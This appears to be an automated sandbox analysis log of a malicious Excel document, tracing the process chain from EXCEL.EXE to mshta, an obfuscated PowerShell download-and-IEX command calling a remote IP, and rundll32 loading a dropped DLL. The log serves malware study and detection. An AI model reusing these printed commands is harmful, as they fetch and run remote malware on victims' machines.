                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.htmlJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMdJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServerJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE2EE.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002B5988 CreateToolhelp32Snapshot,16_2_002B5988
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB4 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb: source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdbm source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032F08CC push 8B4902E0h; iretd 4_3_032F08D1
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032F00C2 push 8B4902E0h; iretd 4_3_032F00C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: JooSee.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x8ba6a
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Svccveo\pcrxj.oyh (copy)Jump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Svccveo\pcrxj.oyh (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Svccveo\pcrxj.oyh:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 2548Thread sleep time: -360000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-32093
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-32093
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: rundll32.exe, 0000000C.00000002.551291217.000000000045A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002B7E00 FindFirstFileW,16_2_002B7E00
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E4087 mov eax, dword ptr fs:[00000030h]9_2_002E4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00314087 mov eax, dword ptr fs:[00000030h]10_2_00314087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00784087 mov eax, dword ptr fs:[00000030h]11_2_00784087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00224087 mov eax, dword ptr fs:[00000030h]12_2_00224087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00314087 mov eax, dword ptr fs:[00000030h]15_2_00314087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002C4087 mov eax, dword ptr fs:[00000030h]16_2_002C4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
